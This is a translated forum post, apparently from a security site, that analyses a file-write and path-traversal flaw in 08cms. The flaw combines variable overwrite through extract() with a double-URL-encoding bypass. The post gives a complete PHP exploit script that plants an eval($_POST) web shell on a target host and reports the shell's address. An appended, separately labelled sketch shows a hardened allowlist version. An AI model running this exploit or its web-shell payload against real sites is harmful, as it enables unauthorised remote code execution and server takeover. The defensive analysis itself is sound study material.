I am also a beginner. If the PHP is wrong somewhere, I hope you can point out the mistake...

/include/general.inc.php lines 21-26

```php
(isset($_REQUEST['GLOBALS']) || isset($_FILES['GLOBALS'])) && exit('08cms Error');
if(!QUOTES_GPC && $_FILES) $_FILES = maddslashes($_FILES);
foreach(array('_GET','_POST') as $_request){
    foreach($$_request as $k => $v){
        $k{0} != '_' && $$k = maddslashes($v);
    }
}
```
This is simply written, but we can still submit variables that are not initialized. Let's take a look at the index.php file.

```php
include_once dirname(__FILE__).'/include/general.inc.php';
include_once M_ROOT.'./include/common.fun.php';
if_siteclosed();
mobile_open() || message('mobile phone version not open');
parse_str(un_virtual($_SERVER['QUERY_STRING']), $temparr);
```

Let's look at the code. $_SERVER['QUERY_STRING'] obtains the query string; for example, for xx.php?id=222 it gets id=222. un_virtual is the function used to filter the query string it obtains. Let's take a look at that function:

```php
function un_virtual($str){
    ......
    $str = str_replace(array('/', '-'), array('&', '='), $str);   // replace / and - with & and =
    ......
    return $str;
}
```

parse_str() parses the query string into variables and stores them in $temparr. Let's take a look at what follows:

```php
$_da = array();
if(!$cnstr){
    $tplname = $_ismobile ? $o_index_tpl : $hometpl;   // $tplname is defined here
    $_da['rss'] = $cms_abs.'rss.php';
    $_da += $temparr;                                  // $_da = $_da + $temparr
    unset($temparr);                                   // destroy the variable
    extract($_da, EXTR_OVERWRITE);                     // the variable overwrite, so we can control $tplname
    tpl_refresh($tplname);                             // tpl_refresh is the function we want to use; let's see what it does
    ......
```
\include\refresh.fun.php line 2

```php
function tpl_refresh($tplname){
    global $templatedir, $debugtag;
    $tdir = M_ROOT."template/$templatedir/";
    $cacf = $tdir.'pcache/'.$tplname.'.php';
    // if(file_exists($x = $tdir."function/utags.fun.php")) include_once $x;   // here, of course, you could also use the truncation
    mmkdir($cacf, 0, 1);
    if($debugtag || !file_exists($cacf)){   // a simple process
        $str = load_tpl($tplname);          // check whether this function returns the content of the opened file
        /* load_tpl: include\refresh.fun.php line 1137
        $tpl = @file2str(M_ROOT."template/$templatedir/".$tplname);   // file2str is the function that opens the file, I will not paste it
        $rt && $tpl = preg_replace("/\{tpl\$(.+?)\}/ies", "rtagval('\\1','$rt')", $tpl);   // the filter is no pressure
        */
        $str = preg_replace("/<\\?(?!php\s|=|\s)/i", '<?=\'<?\'?>', $str);   // still no pressure
        $str = preg_replace("/\<\!\-\{(.+?)\}\-\>/s", "{\\1}", $str);
        breplace($str, '');
        nreplace($str);
        quit_refresh_var();
        $str = tpl_basecode($str);   // the code above does the filtering
        str2file($str, $cacf);        // this is the file write function, not pasted
    }
    unset($str, $tdir, $cacf);
}
```
With this, we can write files, but there are still some restrictions.
```php
$cacf = $tdir.'pcache/'.$tplname.'.php';
$str = load_tpl($tplname);
$tpl = @file2str(M_ROOT."template/$templatedir/".$tplname);
```

$tplname is controlled by us. We can upload an image to generate a file. We can also find other places where the trojan gets written: \tools\ptool.php.
```php
$cf = M_ROOT.'./dynamic/stats/aclicks.cac';
$ct = M_ROOT.'./dynamic/stats/aclicks_time.cac';
/* omitted */
if(@$fp = fopen($cf, 'a')){
    fwrite($fp, "$aid\n");
    fclose($fp);
```

$aid is not initialized, so we can submit it. Now we can write the file, but there is still a restriction: it cannot jump out of the directory, because of the filter at the beginning (the code at the start), parse_str(un_virtual($_SERVER['QUERY_STRING']), $temparr); however, because parse_str will automatically URL-decode, we can add a layer of URL encoding to bypass the un_virtual filter ~ This CMS still has many problems.. The exp, written by a newbie, may have mistakes:
```php
<?php
/*
car CMS 4.1 GBK:
    exp   index.php?tplname=..%252f..%252fdynamic%252fstats%252faclicks.cac
    shell /dynamic/tplcache/common/....dynamicstatsaclicks.cac.php
decoration CMS:
    shell /dynamic/stats/aclicks.cac.php
*/
$exp  = '/tools/ptool.php?aid=%3C%3Fphp%20eval%28%24_POST%5Ba%5D%29%3B%3F%3E';
$exp1 = '/index.php?tplname=..%2f..%2fdynamic%2fstats%2faclicks.cac';
if($argc < 2){
    print_r("+-----------------------------------------------+\n[+] php ".$argv[0]."  www.08sec.com\n+-----------------------------------------------+\n");
    exit;
}
error_reporting(E_ERROR);
set_time_limit(0);
$host = $argv[1];
go($host);

function go($host){
    global $exp, $exp1;
    $re = Send($host, $exp);
    stripos($re, "MySQL") > 0 ? Send($host, $exp) : "";
    $re = Send($host, $exp1) and stripos($re, "aclicks.cac") > 0
        ? exit("+ Exploit Success!\r\n+ http://$host/template/dynamic/stats/aclicks.cac.php\r\n")
        : exit("- Exploit Failed!\n");
}

function Send($host, $url){
    $data  = "GET $url HTTP/1.1\r\n";
    $data .= "Host: $host\r\n";
    $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 2000) Opera 6.03 [en]\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Accept-Language: en-us\r\n";
    $data .= "Connection: Close\r\n\r\n";
    $fp = @fsockopen($host, 80);
    if(!$fp){
        die("[-] Connect to host Error\r\n");
    }
    fwrite($fp, $data);
    $back = '';
    while(!feof($fp)){
        $back .= fread($fp, 1024);
    }
    fclose($fp);
    return $back;
}
?>
```

Some versions need to be encoded twice, because some of them already decode once. Car CMS 4.1 GBK version: exp index.php?tplname=..%252f..%252fdynamic%252fstats%252faclicks.cac, shell /dynamic/tplcache/common/....dynamicstatsaclicks.cac.php. Decoration CMS: shell /dynamic/stats/aclicks.cac.php. Attached is an HTML upload code:
(Because many of the 08cms versions in articles are the car 4.3 UTF-8 version.) Sorry... Finally, no handouts for freeloaders!
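To make the overwrite and the decoding order concrete, the following is an added example, not code from the original post or from 08cms: a self-contained PHP sketch of the vulnerable flow beside a version that reads the parameter explicitly and allowlists the template name. The names un_virtual_like(), vulnerable_tplname() and safe_tplname() are assumed for the illustration.

```php
<?php
// Added example (not 08cms code). un_virtual_like() mimics the page's
// un_virtual(): '/' -> '&' and '-' -> '='.
function un_virtual_like(string $s): string {
    return str_replace(['/', '-'], ['&', '='], $s);
}

// Vulnerable flow: the query string is parsed into $temparr, merged into $_da
// and extract()ed with EXTR_OVERWRITE, so a 'tplname' parameter in the request
// replaces the template name chosen by the code. parse_str() URL-decodes after
// un_virtual() ran, so '%2f' only turns into '/' after the filter looked at it.
function vulnerable_tplname(string $query_string): string {
    $tplname = 'index.htm';                      // value chosen by the application
    parse_str(un_virtual_like($query_string), $temparr);
    $_da = ['rss' => 'rss.php'];
    $_da += $temparr;
    extract($_da, EXTR_OVERWRITE);               // request data overwrites $tplname
    return $tplname;
}

// Hardened flow: request data is read explicitly (no extract()), decoded one
// extra time so a double-encoded value is seen as the server would use it, and
// checked against an allowlist of plain template file names before it can reach
// any path concatenation such as $tdir.'pcache/'.$tplname.'.php'.
function safe_tplname(string $query_string, string $default = 'index.htm'): string {
    parse_str(un_virtual_like($query_string), $temparr);
    if (!isset($temparr['tplname']) || !is_string($temparr['tplname'])) {
        return $default;                         // missing, or tplname[]=... array
    }
    $name = rawurldecode($temparr['tplname']);  // %252f -> %2f -> /
    // Only letters, digits, '_' and single dots between segments; this rejects
    // '..', '/', '\', '%' and NUL, and pins the extension to a template type.
    if (!preg_match('~^[A-Za-z0-9_]+(\.[A-Za-z0-9_]+)*\.(htm|html)$~', $name)) {
        return $default;
    }
    return $name;
}

// Constructed inputs for a stand-alone check: the traversal string from the
// post, and an ordinary template name.
$traversal = 'tplname=..%2f..%2fdynamic%2fstats%2faclicks.cac';
var_dump(vulnerable_tplname($traversal));       // escapes the template directory
var_dump(safe_tplname($traversal));             // falls back to index.htm
var_dump(safe_tplname('tplname=list.htm'));     // accepted
```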